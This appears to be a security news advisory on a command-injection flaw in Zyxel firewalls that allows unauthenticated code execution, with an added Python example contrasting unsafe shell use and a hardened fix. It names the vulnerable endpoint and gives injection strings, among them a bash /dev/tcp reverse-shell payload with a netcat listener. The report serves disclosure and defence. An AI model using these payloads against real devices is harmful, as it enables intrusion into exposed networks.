Vulnerability in Zyxel firewalls allowing unauthenticated code execution

A critical vulnerability (CVE-2022-30525) has been identified in Zyxel devices of the ATP, VPN and USG FLEX series, which are designed to provide firewall, IDS and VPN functions in enterprises. It allows a remote attacker to execute code on the device without privileges and without authentication. To carry out the attack, the attacker only needs to be able to send requests to the device over HTTP/HTTPS. Zyxel has fixed the vulnerability in the ZLD 5.30 firmware update. According to the Shodan service, there are currently 16213 potentially vulnerable devices on the global network that accept requests over HTTP/HTTPS.

The attack is carried out by sending specially crafted commands to the web handler /ztp/cgi-bin/handler, which is reachable without authentication. The problem is caused by the lack of proper sanitisation of request parameters when executing system commands through the os.system call used in the lib_wan_settings.py library, which is invoked while processing the setWanPortSt operation.

For example, an attacker can pass the string "; ping 192.168.1.210;", which results in the command "ping 192.168.1.210" being executed on the system. To obtain a command shell, one can run "nc -lvnp 1270" on one's own machine and then initiate a reverse connection by sending the device a request containing '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
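The two paragraphs above describe the bug class (a request field spliced into a string handed to os.system) and the shape of the payload (a `;`-separated second command). The following is an added illustration written for this page, not Zyxel's code and not taken from lib_wan_settings.py: a harmless `echo` stands in for the real network-configuration command, the parameter name `mtu` and the handler function are assumed for the example, and the payload is constructed to mirror the "; ping ...;" pattern. It shows the unsafe pattern executing the injected command, and a hardened variant that allow-lists the value and runs it without a shell.

```python
import re
import subprocess

# Model of the unsafe pattern described in the article: attacker-controlled text
# reaches /bin/sh. os.system(cmd) and subprocess.run(cmd, shell=True) behave the
# same way here; shell=True is used only so the output can be captured and returned.
def run_vulnerable(mtu: str) -> str:
    cmd = "echo set mtu %s" % mtu  # no validation, no quoting: "1500; echo X" runs two commands
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


# Hardened variant (assumed fix, not Zyxel's): allow-list the value, then execute
# with an argument list so no shell ever parses the attacker's input.
MTU_RE = re.compile(r"^\d{3,4}$")  # digits only; range checked below


def run_hardened(mtu: str) -> str:
    if not MTU_RE.fullmatch(mtu) or not 576 <= int(mtu) <= 9000:
        raise ValueError("invalid MTU: %r" % mtu)
    # argv form: the value is a single argument, never interpreted as shell syntax
    result = subprocess.run(["echo", "set", "mtu", mtu], capture_output=True, text=True)
    return result.stdout


def handle_set_wan_port_st(params: dict, hardened: bool = True) -> str:
    """Stand-in for the request dispatcher: pulls the assumed 'mtu' field out of the body."""
    mtu = str(params.get("mtu", ""))
    return run_hardened(mtu) if hardened else run_vulnerable(mtu)


if __name__ == "__main__":
    benign = {"mtu": "1500"}
    # Constructed payload with the same shape as "; ping 192.168.1.210;" in the article.
    hostile = {"mtu": "1500; echo INJECTED"}

    print(handle_set_wan_port_st(benign, hardened=False), end="")   # set mtu 1500
    print(handle_set_wan_port_st(hostile, hardened=False), end="")  # set mtu 1500 / INJECTED
    try:
        handle_set_wan_port_st(hostile, hardened=True)
    except ValueError as exc:
        print("rejected:", exc)
```

The second call shows why the separator matters: the shell splits the interpolated string at `;` and runs `echo INJECTED` as an independent command, which is exactly how the `ping` and the `bash -c` reverse-shell payloads above get executed. The hardened path rejects the value before any process is spawned, and even a value that slipped through the check would reach the program as one argv element rather than shell text.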

Source: opennet.ru
